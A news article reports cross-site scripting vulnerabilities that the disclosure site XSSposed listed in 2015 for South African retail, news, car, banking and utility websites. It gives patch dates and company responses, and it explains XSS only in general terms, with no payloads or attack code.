Several prominent South African websites appear to be vulnerable to cross-site scripting (XSS) vulnerabilities, according to the online open bug bounty community XSSposed.
Established in 2014 as an XSS archive, XSSposed’s listings for SA websites grew substantially during July 2015.
XSS vulnerabilities occur when a web application uses input from a user within the output it generates without validating or encoding it.
An XSS attack is a type of injection, and may be used to send a malicious script to a user whose browser has no way to determine that the script should not be trusted.
In this way, attackers can access cookies, session tokens, or other sensitive information retained by the browser and used with that site.
Prominent SA websites exposed
Among the websites listed on XSSposed are South African e-commerce players Takealot, Makro, Game, OLX, Spree, Zando, and Raru.
Some of the vulnerabilities reported are already listed as fixed, while others are still in the “hold” phase, allowing sites to patch issues before they are disclosed.
Takealot.com had a vulnerability in its search system reported on 14 July 2015 which was patched on 4 August. A new vulnerability was reported on 27 July, which is still “on hold”.
Takealot was asked for feedback about the security flaws, but the company did not respond by the time of publication.
Raru had a vulnerability reported on 22 July which was patched on 24 July, and has already been publicly disclosed. Raru director Neil Smith said they patched the issue on the day they were alerted to it.
“From a technical side, the vulnerability wasn’t in the original site code, but introduced via changes we deployed later on,” said Smith. He said it shows how important it is to test new code for security holes before deployment.
Smith said their experience with XSSposed has been positive.
“It helps alert website owners to potential problems on their sites. We also appreciate having enough time to close the vulnerabilities before the info goes public.”
Zando said it fixed the vulnerability on its site within a day.
Makro digital executive Paul van de Waal said they recently updated their online store, which included security enhancements, which may have resolved the vulnerabilities reported on XSSposed.
The vulnerabilities on Makro’s site were reported on 23 July, when Van de Waal said the previous version of their site was still online.
“Unfortunately, we have not had a chance to contact the researcher who submitted the requests so we cannot validate what issues were detected.”
He added that the work Makro does with its third-party security consultants makes it confident that there are no major security flaws on its site.
News websites, Autotrader, and Cars.co.za
Other websites with reported vulnerabilities included those for Son, BusinessDay Live, Sunday World, Timeslive, The Daily Sun, and Eyewitness News.
As with the e-commerce sites, many of the bugs have been patched already, while others are still on hold.
Autotrader and Cars.co.za were also reported to have security flaws. Asked for comment, Cars.co.za said it has implemented checks for XSS vulnerabilities. AutoTrader did not give comment by the time of publication.
Of some concern is the XSS vulnerability reported on the website for Standard Bank, which is still listed as unpatched.
The bank said it is aware of the issue and is deploying measures to mitigate any risk.
“We would like to emphasize that this is limited to the Standard Bank home page, which is essentially Standard Bank’s marketing interface,” a spokesperson said.
“Standard Bank’s Internet Banking portal is not impacted by this in any way. As such the integrity of our client information remains intact.”
Eskom’s website was listed as vulnerable to XSS attacks on 14 September 2014, and according to reports it is still vulnerable.
The utility was asked about the listed security problems with its website, but has not responded to requests for comment.
Update: Takealot has provided the following statement from its Co-CEO and CTO Willlem Van Biljon.
At Takealot we take the security of our website extremely seriously. We have ongoing technology processes in place to monitor and repair any security vulnerabilities identified by our team or the wider technology community.
The security flaws reported on the website XSSposed on the 14th and 27th of July have been fixed by our technology team and we continue to take steps to improve the security of our website.
We are very grateful to the developer community who help us to identify any security flaws and remain committed to provide a safe environment where our customers can enjoying shopping with us.